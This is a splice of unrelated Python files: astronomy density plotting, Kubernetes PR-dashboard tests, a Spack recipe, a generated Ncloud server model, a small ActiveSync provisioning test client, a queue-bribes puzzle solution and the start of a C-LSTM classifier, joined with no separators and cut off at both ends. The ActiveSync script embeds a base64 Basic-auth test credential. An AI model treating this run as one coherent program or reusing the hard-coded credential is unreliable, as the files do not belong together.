ylim=plot_lim) fig.tight_layout() plt.savefig(suffix + '_2.png', dpi=300) plt.close() stars_density = KernelDensity(bandwidth=30, kernel='epanechnikov').fit(plane_intersects_2D) grid_pos = np.linspace(-1000, 1000, 2000) _x, _y = np.meshgrid(grid_pos, grid_pos) print 'Computing density field' density_field = stars_density.score_samples(np.vstack((_x.ravel(), _y.ravel())).T) + np.log(plane_intersects_2D.shape[0]) density_field = np.exp(density_field).reshape(_x.shape) * 1e3 fig, ax = plt.subplots(1, 1) im_ax = ax.imshow(density_field, interpolation=None, cmap='seismic', origin='lower', vmin=0.) # , vmax=4.) 
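# the plotted field is exp(score_samples(...) + log N): score_samples returns
# a per-point log-density, so adding log(N) before exponentiating gives an
# unnormalized stellar number density on the grid (scaled by 1e3 for display)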
fig.colorbar(im_ax) ax.set_axis_off() fig.tight_layout() # plt.savefig(suffix + '_3.png', dpi=250) plt.show() plt.close() heights, edges = np.histogram(density_field, bins=100, range=(1e-5, np.percentile(density_field,98))) width = np.abs(edges[0] - edges[1]) plt.bar(edges[:-1], heights, width=width, color='green', alpha=0.5) plt.show() plt.close() #!/usr/bin/env python # Copyright 2016 The Kubernetes Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import datetime import unittest # TODO(fejta): use non-relative imports # https://google.github.io/styleguide/pyguide.html?showone=Packages#Packages import gcs_async_test from github import models import main_test import view_pr from webapp2_extras import securecookie app = main_test.app write = gcs_async_test.write class PathTest(unittest.TestCase): def test_org_repo(self): def check(path, org, repo): actual_org, actual_repo = view_pr.org_repo(path, 'kubernetes', 'kubernetes') self.assertEquals(actual_org, org) self.assertEquals(actual_repo, repo) check('', 'kubernetes', 'kubernetes') check('/test-infra', 'kubernetes', 'test-infra') check('/kubernetes', 'kubernetes', 'kubernetes') check('/kubernetes/test-infra', 'kubernetes', 'test-infra') check('/kubernetes/kubernetes', 'kubernetes', 'kubernetes') check('/google/cadvisor', 'google', 'cadvisor') def test_pr_path(self): def check(org, repo, pr, path): actual_path = view_pr.pr_path(org, repo, pr, 'kubernetes', 'kubernetes', 'pull_prefix') self.assertEquals(actual_path, '%s/%s' % ('pull_prefix', path)) check('kubernetes', 'kubernetes', 1234, 1234) check('kubernetes', 'kubernetes', 'batch', 'batch') check('kubernetes', 'test-infra', 555, 'test-infra/555') check('kubernetes', 'test-infra', 'batch', 'test-infra/batch') check('google', 'cadvisor', '555', 'google_cadvisor/555') check('google', 'cadvisor', 'batch', 'google_cadvisor/batch') class PRTest(main_test.TestBase): BUILDS = { 'build': [('12', {'version': 'bb', 'timestamp': 1467147654}, None), ('11', {'version': 'bb', 'timestamp': 1467146654}, {'result': 'PASSED', 'passed': True}), ('10', {'version': 'aa', 'timestamp': 1467136654}, {'result': 'FAILED', 'passed': False})], 'e2e': [('47', {'version': 'bb', 'timestamp': '1467147654'}, {'result': '[UNSET]', 'passed': False}), ('46', {'version': 'aa', 'timestamp': '1467136700'}, {'result': '[UNSET]', 'passed': False})] } def setUp(self): self.init_stubs() def init_pr_directory(self): gcs_async_test.install_handler(self.testbed.get_stub('urlfetch'), {'123/': ['build', 'e2e'], '123/build/': ['11', '10', '12'], # out of order '123/e2e/': ['47', '46']}) for job, builds in self.BUILDS.iteritems(): for build, started, finished in builds: path = '/kubernetes-jenkins/pr-logs/pull/123/%s/%s/' % (job, build) if started: write(path + 'started.json', started) if finished: write(path + 'finished.json', finished) def test_pr_builds(self): self.init_pr_directory() org, repo = view_pr.org_repo('', app.app.config['default_org'], app.app.config['default_repo'], ) builds = view_pr.pr_builds(view_pr.pr_path(org, repo, '123', 
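# pr_path assembles the GCS prefix for PR 123 and pr_builds reads back the
# started.json / finished.json files written by init_pr_directory above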
app.app.config['default_repo'], app.app.config['default_repo'], app.app.config['default_external_services']['gcs_pull_prefix'], )) self.assertEqual(builds, self.BUILDS) def test_pr_handler(self): self.init_pr_directory() response = app.get('/pr/123') self.assertIn('e2e/47', response) self.assertIn('PASSED', response) self.assertIn('colspan="3"', response) # header self.assertIn('github.com/kubernetes/kubernetes/pull/123', response) self.assertIn('28 20:44', response) def test_pr_handler_missing(self): gcs_async_test.install_handler(self.testbed.get_stub('urlfetch'), {'124/': []}) response = app.get('/pr/124') self.assertIn('No Results', response) def test_pr_build_log_redirect(self): path = '123/some-job/55/build-log.txt' response = app.get('/pr/' + path) self.assertEqual(response.status_code, 302) self.assertIn('https://storage.googleapis.com', response.location) self.assertIn(path, response.location) def make_pr(number, involved, payload, repo='kubernetes/kubernetes'): payload.setdefault('attn', {}) payload.setdefault('assignees', []) payload.setdefault('author', involved[0]) payload.setdefault('labels', {}) digest = models.GHIssueDigest.make(repo, number, is_pr=True, is_open=True, involved=involved, payload=payload, updated_at=datetime.datetime.now()) digest.put() class TestDashboard(main_test.TestBase): def setUp(self): app.reset() self.init_stubs() def test_empty(self): resp = app.get('/pr/all') self.assertIn('No Results', resp) resp = app.get('/pr/nobody') self.assertIn('No Results', resp) def test_all(self): make_pr(12, ['foo'], {'title': 'first'}, 'google/cadvisor') make_pr(13, ['bar'], {'title': 'second'}, 'kubernetes/kubernetes') resp = app.get('/pr/all') self.assertIn('Open Kubernetes PRs', resp) self.assertIn('first', resp) self.assertIn('second', resp) def test_json(self): make_pr(12, ['a'], {'title': 'b'}, 'c/d') resp = app.get('/pr/all?format=json') self.assertEqual(resp.headers['Content-Type'], 'application/json') self.assertEqual(len(resp.json), 1) pr = resp.json[0] self.assertEqual(pr['involved'], ['a']) self.assertEqual(pr['number'], 12) self.assertEqual(pr['repo'], 'c/d') def test_one_entry(self): make_pr(123, ['user'], {'attn': {'user': 'fix tests'}}) resp = app.get('/pr/user') self.assertIn('123', resp) def test_case_insensitive(self): "Individual PR pages are case insensitive." make_pr(123, ['user'], {'attn': {'User': 'fix tests'}}) resp = app.get('/pr/UseR') self.assertIn('123', resp) self.assertIn('Needs Attention (1)', resp) def test_milestone(self): "Milestone links filter by milestone." make_pr(123, ['user'], {'attn': {'User': 'fix tests'}}) make_pr(124, ['user'], {'attn': {'user': 'fix tests'}, 'milestone': 'v1.24'}) resp = app.get('/pr/user') self.assertIn('v1.24', resp) self.assertIn('123', resp) self.assertIn('124', resp) resp = app.get('/pr/user?milestone=v1.24') # Don't match timestamps that happen to include "123". 
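# (\b word boundaries make the regex match "123" only as a standalone token,
# so a longer digit run such as a timestamp containing "123" is not a false positive)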
self.assertNotRegexpMatches(str(resp), r'\b123\b') self.assertIn('124', resp) @staticmethod def make_session(**kwargs): # set the session cookie directly (easier than the full login flow) serializer = securecookie.SecureCookieSerializer( app.app.config['webapp2_extras.sessions']['secret_key']) return serializer.serialize('session', kwargs) def test_me(self): make_pr(124, ['human'], {'title': 'huge pr!'}) # no cookie: we get redirected resp = app.get('/pr') self.assertEqual(resp.status_code, 302) self.assertEqual(resp.location, 'http://localhost/github_auth/pr') # we have a cookie now: we should get results for 'human' cookie = self.make_session(user='human') resp = app.get('/pr', headers={'Cookie': 'session=%s' % cookie}) self.assertEqual(resp.status_code, 200) self.assertIn('huge pr!', resp) def test_pr_links_user(self): "Individual PR pages grab digest information" gcs_async_test.install_handler(self.testbed.get_stub('urlfetch'), {'12345/': []}) make_pr(12345, ['human'], {'title': 'huge pr!'}) resp = app.get('/pr/12345') self.assertIn('href="/pr/human"', resp) self.assertIn('huge pr!', resp) def test_build_links_user(self): "Build pages show PR information" make_pr(12345, ['human'], {'title': 'huge pr!'}) build_dir = '/kubernetes-jenkins/pr-logs/pull/12345/e2e/5/' write(build_dir + 'started.json', '{}') resp = app.get('/build' + build_dir) self.assertIn('href="/pr/human"', resp) self.assertIn('huge pr!', resp) def test_acks(self): app.get('/') # initialize session secrets make_pr(124, ['human'], {'title': 'huge pr', 'attn': {'human': 'help#123#456'}}, repo='k/k') cookie = self.make_session(user='human') headers = {'Cookie': 'session=%s' % cookie} def expect_count(count): resp = app.get('/pr', headers=headers) self.assertEqual(resp.body.count('huge pr'), count) # PR should appear twice expect_count(2) # Ack the PR... ack_params = {'command': 'ack', 'repo': 'k/k', 'number': 124, 'latest': 456} app.post_json('/pr', ack_params, headers=headers) expect_count(1) self.assertEqual(view_pr.get_acks('human', []), {'k/k 124': 456}) # Clear the ack app.post_json('/pr', {'command': 'ack-clear'}, headers=headers) expect_count(2) self.assertEqual(view_pr.get_acks('human', []), {}) # Ack with an older latest ack_params['latest'] = 123 app.post_json('/pr', ack_params, headers=headers) expect_count(2) if __name__ == '__main__': unittest.main() # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Flashdimmsim(Package): """FlashDIMMSim: a reasonably accurate flash DIMM simulator.""" homepage = "https://github.com/slunk/FlashDIMMSim" git = "https://github.com/slunk/FlashDIMMSim.git" version('master', branch='master') build_directory = 'src' def install(self, spec, prefix): with working_dir(self.build_directory): make() # build program make('libfdsim.so') # build shared library mkdir(prefix.bin) mkdir(prefix.lib) mkdir(prefix.include) install_tree('ini', join_path(prefix, 'ini')) install('FDSim', prefix.bin) install('libfdsim.so', prefix.lib) install('*.h', prefix.include) 10-100 # coding: utf-8 """ vserver Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six from ncloud_vserver.model.common_code import CommonCode # noqa: F401,E501 class ServerInstance(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. 
""" """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'server_instance_no': 'str', 'server_name': 'str', 'server_description': 'str', 'cpu_count': 'int', 'memory_size': 'int', 'platform_type': 'CommonCode', 'login_key_name': 'str', 'public_ip_instance_no': 'str', 'public_ip': 'str', 'server_instance_status': 'CommonCode', 'server_instance_operation': 'CommonCode', 'server_instance_status_name': 'str', 'create_date': 'str', 'uptime': 'str', 'server_image_product_code': 'str', 'server_product_code': 'str', 'is_protect_server_termination': 'bool', 'zone_code': 'str', 'region_code': 'str', 'vpc_no': 'str', 'subnet_no': 'str', 'network_interface_no_list': 'list[str]', 'init_script_no': 'str', 'server_instance_type': 'CommonCode', 'base_block_storage_disk_type': 'CommonCode', 'base_block_storage_disk_detail_type': 'CommonCode', 'placement_group_no': 'str' } attribute_map = { 'server_instance_no': 'serverInstanceNo', 'server_name': 'serverName', 'server_description': 'serverDescription', 'cpu_count': 'cpuCount', 'memory_size': 'memorySize', 'platform_type': 'platformType', 'login_key_name': 'loginKeyName', 'public_ip_instance_no': 'publicIpInstanceNo', 'public_ip': 'publicIp', 'server_instance_status': 'serverInstanceStatus', 'server_instance_operation': 'serverInstanceOperation', 'server_instance_status_name': 'serverInstanceStatusName', 'create_date': 'createDate', 'uptime': 'uptime', 'server_image_product_code': 'serverImageProductCode', 'server_product_code': 'serverProductCode', 'is_protect_server_termination': 'isProtectServerTermination', 'zone_code': 'zoneCode', 'region_code': 'regionCode', 'vpc_no': 'vpcNo', 'subnet_no': 'subnetNo', 'network_interface_no_list': 'networkInterfaceNoList', 'init_script_no': 'initScriptNo', 'server_instance_type': 'serverInstanceType', 'base_block_storage_disk_type': 'baseBlockStorageDiskType', 'base_block_storage_disk_detail_type': 'baseBlockStorageDiskDetailType', 'placement_group_no': 'placementGroupNo' } def __init__(self, server_instance_no=None, server_name=None, server_description=None, cpu_count=None, memory_size=None, platform_type=None, login_key_name=None, public_ip_instance_no=None, public_ip=None, server_instance_status=None, server_instance_operation=None, server_instance_status_name=None, create_date=None, uptime=None, server_image_product_code=None, server_product_code=None, is_protect_server_termination=None, zone_code=None, region_code=None, vpc_no=None, subnet_no=None, network_interface_no_list=None, init_script_no=None, server_instance_type=None, base_block_storage_disk_type=None, base_block_storage_disk_detail_type=None, placement_group_no=None): # noqa: E501 """ServerInstance - a model defined in Swagger""" # noqa: E501 self._server_instance_no = None self._server_name = None self._server_description = None self._cpu_count = None self._memory_size = None self._platform_type = None self._login_key_name = None self._public_ip_instance_no = None self._public_ip = None self._server_instance_status = None self._server_instance_operation = None self._server_instance_status_name = None self._create_date = None self._uptime = None self._server_image_product_code = None self._server_product_code = None self._is_protect_server_termination = None self._zone_code = None self._region_code = None self._vpc_no = None self._subnet_no = None self._network_interface_no_list = None 
self._init_script_no = None self._server_instance_type = None self._base_block_storage_disk_type = None self._base_block_storage_disk_detail_type = None self._placement_group_no = None self.discriminator = None if server_instance_no is not None: self.server_instance_no = server_instance_no if server_name is not None: self.server_name = server_name if server_description is not None: self.server_description = server_description if cpu_count is not None: self.cpu_count = cpu_count if memory_size is not None: self.memory_size = memory_size if platform_type is not None: self.platform_type = platform_type if login_key_name is not None: self.login_key_name = login_key_name if public_ip_instance_no is not None: self.public_ip_instance_no = public_ip_instance_no if public_ip is not None: self.public_ip = public_ip if server_instance_status is not None: self.server_instance_status = server_instance_status if server_instance_operation is not None: self.server_instance_operation = server_instance_operation if server_instance_status_name is not None: self.server_instance_status_name = server_instance_status_name if create_date is not None: self.create_date = create_date if uptime is not None: self.uptime = uptime if server_image_product_code is not None: self.server_image_product_code = server_image_product_code if server_product_code is not None: self.server_product_code = server_product_code if is_protect_server_termination is not None: self.is_protect_server_termination = is_protect_server_termination if zone_code is not None: self.zone_code = zone_code if region_code is not None: self.region_code = region_code if vpc_no is not None: self.vpc_no = vpc_no if subnet_no is not None: self.subnet_no = subnet_no if network_interface_no_list is not None: self.network_interface_no_list = network_interface_no_list if init_script_no is not None: self.init_script_no = init_script_no if server_instance_type is not None: self.server_instance_type = server_instance_type if base_block_storage_disk_type is not None: self.base_block_storage_disk_type = base_block_storage_disk_type if base_block_storage_disk_detail_type is not None: self.base_block_storage_disk_detail_type = base_block_storage_disk_detail_type if placement_group_no is not None: self.placement_group_no = placement_group_no @property def server_instance_no(self): """Gets the server_instance_no of this ServerInstance. # noqa: E501 서버인스턴스번호 # noqa: E501 :return: The server_instance_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._server_instance_no @server_instance_no.setter def server_instance_no(self, server_instance_no): """Sets the server_instance_no of this ServerInstance. 서버인스턴스번호 # noqa: E501 :param server_instance_no: The server_instance_no of this ServerInstance. # noqa: E501 :type: str """ self._server_instance_no = server_instance_no @property def server_name(self): """Gets the server_name of this ServerInstance. # noqa: E501 서버이름 # noqa: E501 :return: The server_name of this ServerInstance. # noqa: E501 :rtype: str """ return self._server_name @server_name.setter def server_name(self, server_name): """Sets the server_name of this ServerInstance. 서버이름 # noqa: E501 :param server_name: The server_name of this ServerInstance. # noqa: E501 :type: str """ self._server_name = server_name @property def server_description(self): """Gets the server_description of this ServerInstance. # noqa: E501 서버설명 # noqa: E501 :return: The server_description of this ServerInstance. 
# noqa: E501 :rtype: str """ return self._server_description @server_description.setter def server_description(self, server_description): """Sets the server_description of this ServerInstance. 서버설명 # noqa: E501 :param server_description: The server_description of this ServerInstance. # noqa: E501 :type: str """ self._server_description = server_description @property def cpu_count(self): """Gets the cpu_count of this ServerInstance. # noqa: E501 CPU개수 # noqa: E501 :return: The cpu_count of this ServerInstance. # noqa: E501 :rtype: int """ return self._cpu_count @cpu_count.setter def cpu_count(self, cpu_count): """Sets the cpu_count of this ServerInstance. CPU개수 # noqa: E501 :param cpu_count: The cpu_count of this ServerInstance. # noqa: E501 :type: int """ self._cpu_count = cpu_count @property def memory_size(self): """Gets the memory_size of this ServerInstance. # noqa: E501 메모리사이즈 # noqa: E501 :return: The memory_size of this ServerInstance. # noqa: E501 :rtype: int """ return self._memory_size @memory_size.setter def memory_size(self, memory_size): """Sets the memory_size of this ServerInstance. 메모리사이즈 # noqa: E501 :param memory_size: The memory_size of this ServerInstance. # noqa: E501 :type: int """ self._memory_size = memory_size @property def platform_type(self): """Gets the platform_type of this ServerInstance. # noqa: E501 플랫폼유형 # noqa: E501 :return: The platform_type of this ServerInstance. # noqa: E501 :rtype: CommonCode """ return self._platform_type @platform_type.setter def platform_type(self, platform_type): """Sets the platform_type of this ServerInstance. 플랫폼유형 # noqa: E501 :param platform_type: The platform_type of this ServerInstance. # noqa: E501 :type: CommonCode """ self._platform_type = platform_type @property def login_key_name(self): """Gets the login_key_name of this ServerInstance. # noqa: E501 로그인키이름 # noqa: E501 :return: The login_key_name of this ServerInstance. # noqa: E501 :rtype: str """ return self._login_key_name @login_key_name.setter def login_key_name(self, login_key_name): """Sets the login_key_name of this ServerInstance. 로그인키이름 # noqa: E501 :param login_key_name: The login_key_name of this ServerInstance. # noqa: E501 :type: str """ self._login_key_name = login_key_name @property def public_ip_instance_no(self): """Gets the public_ip_instance_no of this ServerInstance. # noqa: E501 공인IP인스턴스번호 # noqa: E501 :return: The public_ip_instance_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._public_ip_instance_no @public_ip_instance_no.setter def public_ip_instance_no(self, public_ip_instance_no): """Sets the public_ip_instance_no of this ServerInstance. 공인IP인스턴스번호 # noqa: E501 :param public_ip_instance_no: The public_ip_instance_no of this ServerInstance. # noqa: E501 :type: str """ self._public_ip_instance_no = public_ip_instance_no @property def public_ip(self): """Gets the public_ip of this ServerInstance. # noqa: E501 공인IP주소 # noqa: E501 :return: The public_ip of this ServerInstance. # noqa: E501 :rtype: str """ return self._public_ip @public_ip.setter def public_ip(self, public_ip): """Sets the public_ip of this ServerInstance. 공인IP주소 # noqa: E501 :param public_ip: The public_ip of this ServerInstance. # noqa: E501 :type: str """ self._public_ip = public_ip @property def server_instance_status(self): """Gets the server_instance_status of this ServerInstance. # noqa: E501 서버인스턴스상태 # noqa: E501 :return: The server_instance_status of this ServerInstance. 
# noqa: E501 :rtype: CommonCode """ return self._server_instance_status @server_instance_status.setter def server_instance_status(self, server_instance_status): """Sets the server_instance_status of this ServerInstance. 서버인스턴스상태 # noqa: E501 :param server_instance_status: The server_instance_status of this ServerInstance. # noqa: E501 :type: CommonCode """ self._server_instance_status = server_instance_status @property def server_instance_operation(self): """Gets the server_instance_operation of this ServerInstance. # noqa: E501 서버인스턴스OP # noqa: E501 :return: The server_instance_operation of this ServerInstance. # noqa: E501 :rtype: CommonCode """ return self._server_instance_operation @server_instance_operation.setter def server_instance_operation(self, server_instance_operation): """Sets the server_instance_operation of this ServerInstance. 서버인스턴스OP # noqa: E501 :param server_instance_operation: The server_instance_operation of this ServerInstance. # noqa: E501 :type: CommonCode """ self._server_instance_operation = server_instance_operation @property def server_instance_status_name(self): """Gets the server_instance_status_name of this ServerInstance. # noqa: E501 서버인스턴스상태이름 # noqa: E501 :return: The server_instance_status_name of this ServerInstance. # noqa: E501 :rtype: str """ return self._server_instance_status_name @server_instance_status_name.setter def server_instance_status_name(self, server_instance_status_name): """Sets the server_instance_status_name of this ServerInstance. 서버인스턴스상태이름 # noqa: E501 :param server_instance_status_name: The server_instance_status_name of this ServerInstance. # noqa: E501 :type: str """ self._server_instance_status_name = server_instance_status_name @property def create_date(self): """Gets the create_date of this ServerInstance. # noqa: E501 생성일시 # noqa: E501 :return: The create_date of this ServerInstance. # noqa: E501 :rtype: str """ return self._create_date @create_date.setter def create_date(self, create_date): """Sets the create_date of this ServerInstance. 생성일시 # noqa: E501 :param create_date: The create_date of this ServerInstance. # noqa: E501 :type: str """ self._create_date = create_date @property def uptime(self): """Gets the uptime of this ServerInstance. # noqa: E501 업시간 # noqa: E501 :return: The uptime of this ServerInstance. # noqa: E501 :rtype: str """ return self._uptime @uptime.setter def uptime(self, uptime): """Sets the uptime of this ServerInstance. 업시간 # noqa: E501 :param uptime: The uptime of this ServerInstance. # noqa: E501 :type: str """ self._uptime = uptime @property def server_image_product_code(self): """Gets the server_image_product_code of this ServerInstance. # noqa: E501 서버이미지상품코드 # noqa: E501 :return: The server_image_product_code of this ServerInstance. # noqa: E501 :rtype: str """ return self._server_image_product_code @server_image_product_code.setter def server_image_product_code(self, server_image_product_code): """Sets the server_image_product_code of this ServerInstance. 서버이미지상품코드 # noqa: E501 :param server_image_product_code: The server_image_product_code of this ServerInstance. # noqa: E501 :type: str """ self._server_image_product_code = server_image_product_code @property def server_product_code(self): """Gets the server_product_code of this ServerInstance. # noqa: E501 서버상품코드 # noqa: E501 :return: The server_product_code of this ServerInstance. 
# noqa: E501 :rtype: str """ return self._server_product_code @server_product_code.setter def server_product_code(self, server_product_code): """Sets the server_product_code of this ServerInstance. 서버상품코드 # noqa: E501 :param server_product_code: The server_product_code of this ServerInstance. # noqa: E501 :type: str """ self._server_product_code = server_product_code @property def is_protect_server_termination(self): """Gets the is_protect_server_termination of this ServerInstance. # noqa: E501 서버반납보호설정여부 # noqa: E501 :return: The is_protect_server_termination of this ServerInstance. # noqa: E501 :rtype: bool """ return self._is_protect_server_termination @is_protect_server_termination.setter def is_protect_server_termination(self, is_protect_server_termination): """Sets the is_protect_server_termination of this ServerInstance. 서버반납보호설정여부 # noqa: E501 :param is_protect_server_termination: The is_protect_server_termination of this ServerInstance. # noqa: E501 :type: bool """ self._is_protect_server_termination = is_protect_server_termination @property def zone_code(self): """Gets the zone_code of this ServerInstance. # noqa: E501 ZONE코드 # noqa: E501 :return: The zone_code of this ServerInstance. # noqa: E501 :rtype: str """ return self._zone_code @zone_code.setter def zone_code(self, zone_code): """Sets the zone_code of this ServerInstance. ZONE코드 # noqa: E501 :param zone_code: The zone_code of this ServerInstance. # noqa: E501 :type: str """ self._zone_code = zone_code @property def region_code(self): """Gets the region_code of this ServerInstance. # noqa: E501 REGION코드 # noqa: E501 :return: The region_code of this ServerInstance. # noqa: E501 :rtype: str """ return self._region_code @region_code.setter def region_code(self, region_code): """Sets the region_code of this ServerInstance. REGION코드 # noqa: E501 :param region_code: The region_code of this ServerInstance. # noqa: E501 :type: str """ self._region_code = region_code @property def vpc_no(self): """Gets the vpc_no of this ServerInstance. # noqa: E501 VPC번호 # noqa: E501 :return: The vpc_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._vpc_no @vpc_no.setter def vpc_no(self, vpc_no): """Sets the vpc_no of this ServerInstance. VPC번호 # noqa: E501 :param vpc_no: The vpc_no of this ServerInstance. # noqa: E501 :type: str """ self._vpc_no = vpc_no @property def subnet_no(self): """Gets the subnet_no of this ServerInstance. # noqa: E501 서브넷번호 # noqa: E501 :return: The subnet_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._subnet_no @subnet_no.setter def subnet_no(self, subnet_no): """Sets the subnet_no of this ServerInstance. 서브넷번호 # noqa: E501 :param subnet_no: The subnet_no of this ServerInstance. # noqa: E501 :type: str """ self._subnet_no = subnet_no @property def network_interface_no_list(self): """Gets the network_interface_no_list of this ServerInstance. # noqa: E501 네트워크인터페이스번호리스트 # noqa: E501 :return: The network_interface_no_list of this ServerInstance. # noqa: E501 :rtype: list[str] """ return self._network_interface_no_list @network_interface_no_list.setter def network_interface_no_list(self, network_interface_no_list): """Sets the network_interface_no_list of this ServerInstance. 네트워크인터페이스번호리스트 # noqa: E501 :param network_interface_no_list: The network_interface_no_list of this ServerInstance. # noqa: E501 :type: list[str] """ self._network_interface_no_list = network_interface_no_list @property def init_script_no(self): """Gets the init_script_no of this ServerInstance. 
# noqa: E501 초기화스크립트번호 # noqa: E501 :return: The init_script_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._init_script_no @init_script_no.setter def init_script_no(self, init_script_no): """Sets the init_script_no of this ServerInstance. 초기화스크립트번호 # noqa: E501 :param init_script_no: The init_script_no of this ServerInstance. # noqa: E501 :type: str """ self._init_script_no = init_script_no @property def server_instance_type(self): """Gets the server_instance_type of this ServerInstance. # noqa: E501 서버인스턴스유형 # noqa: E501 :return: The server_instance_type of this ServerInstance. # noqa: E501 :rtype: CommonCode """ return self._server_instance_type @server_instance_type.setter def server_instance_type(self, server_instance_type): """Sets the server_instance_type of this ServerInstance. 서버인스턴스유형 # noqa: E501 :param server_instance_type: The server_instance_type of this ServerInstance. # noqa: E501 :type: CommonCode """ self._server_instance_type = server_instance_type @property def base_block_storage_disk_type(self): """Gets the base_block_storage_disk_type of this ServerInstance. # noqa: E501 기본블록스토리지디스크유형 # noqa: E501 :return: The base_block_storage_disk_type of this ServerInstance. # noqa: E501 :rtype: CommonCode """ return self._base_block_storage_disk_type @base_block_storage_disk_type.setter def base_block_storage_disk_type(self, base_block_storage_disk_type): """Sets the base_block_storage_disk_type of this ServerInstance. 기본블록스토리지디스크유형 # noqa: E501 :param base_block_storage_disk_type: The base_block_storage_disk_type of this ServerInstance. # noqa: E501 :type: CommonCode """ self._base_block_storage_disk_type = base_block_storage_disk_type @property def base_block_storage_disk_detail_type(self): """Gets the base_block_storage_disk_detail_type of this ServerInstance. # noqa: E501 기본블록스토리지디스크상세유형 # noqa: E501 :return: The base_block_storage_disk_detail_type of this ServerInstance. # noqa: E501 :rtype: CommonCode """ return self._base_block_storage_disk_detail_type @base_block_storage_disk_detail_type.setter def base_block_storage_disk_detail_type(self, base_block_storage_disk_detail_type): """Sets the base_block_storage_disk_detail_type of this ServerInstance. 기본블록스토리지디스크상세유형 # noqa: E501 :param base_block_storage_disk_detail_type: The base_block_storage_disk_detail_type of this ServerInstance. # noqa: E501 :type: CommonCode """ self._base_block_storage_disk_detail_type = base_block_storage_disk_detail_type @property def placement_group_no(self): """Gets the placement_group_no of this ServerInstance. # noqa: E501 물리배치그룹번호 # noqa: E501 :return: The placement_group_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._placement_group_no @placement_group_no.setter def placement_group_no(self, placement_group_no): """Sets the placement_group_no of this ServerInstance. 물리배치그룹번호 # noqa: E501 :param placement_group_no: The placement_group_no of this ServerInstance. 
# noqa: E501 :type: str """ self._placement_group_no = placement_group_no def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, ServerInstance): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other import socket with socket.create_connection( ("192.168.1.32",80) ) as s: s.send( b'''POST /Microsoft-Server-ActiveSync?jRQJBBBRZkNHIVeRkWMoY4GGI1hiBAAAAAACU1A= HTTP/1.1 Host: 192.168.1.32 User-Agent: MJOHNSONTEST/1.0 Authorization: Basic dGJveEBhcmNoLmxvY2FsOlBhc3N3b3JkMTs= Content-Type: application/vnd.ms-sync Content-Length: 157 ''') s.send( b'\x03\x01j\x00\x00\x0eE\x00\x12VHW\x03MJohnson Test\x00\x01\x18Y\x03MJOHNSON-TEST/1.0\x00\x01Z\x03Test OS 1.0\x00\x01[\x03English\x00\x01\x1c`\x03MJOHNSON-TEST/1.0\x00\x01a\x030\x00\x01b\x03OperatorName\x00\x01\x01\x01\x00\x0eFGH\x03MS-EAS-Provisioning-WBXML\x00\x01\x01\x01\x01' ) print( s.recv(4096) ) gcvalderrama/python_foundations import unittest from collections import defaultdict, deque import sys def minimumBribes(q): moves = 0 for pos, val in enumerate(q): d = (val - 1) - pos if d > 2: return "Too chaotic" start = max(0, val - 2) end = pos + 1 for j in range(start, end): if q[j] > val: moves += 1 return moves def minimumBribesa(final): n = len(final) queue = [i for i in range(1, n + 1)] state = defaultdict(int) n = len(final) for index in range(n): state[final[index]] = index movements = 0 ite = deque(queue[:]) while ite: target = ite.popleft() pos = state[target] index = queue.index(target) dist = abs(pos - index) if dist > 2: return "Too chaotic" while queue[pos] != target: movements += 1 temp = queue[index + 1] queue[index + 1] = target queue[index] = temp index = index + 1 return movements class Test(unittest.TestCase): def test_case(self): peaple = 5 target = [2, 1, 5, 3, 4] result = minimumBribes(target) self.assertEqual(3, result) def test_case_caotic(self): peaple = 5 target = [2, 5, 1, 3, 4] result = minimumBribes(target) self.assertEqual("Too chaotic", result) def test_case_caotic_b(self): target = [5, 1, 2, 3, 7, 8, 6, 4] result = minimumBribes(target) self.assertEqual("Too chaotic", result) def test_case_caotic(self): #arget = [1, 2, 3, 4, 5, 6, 7, 8] target = [1, 2, 5, 3, 7, 8, 6, 4] result = minimumBribes(target) self.assertEqual(7, result) # -*- coding: utf-8 -*- import numpy as np import tensorflow as tf class clstm_clf(object): """ A C-LSTM classifier for text classification Reference: A C-LSTM Neural Network for Text Classification """ def __init__(self, config): self.max_length = config.max_length self.num_classes = config.num_classes self.vocab_size = config.vocab_size self.embedding_size = config.embedding_size self.filter_sizes = list(map(int, config.filter_sizes.split(","))) self.num_filters 
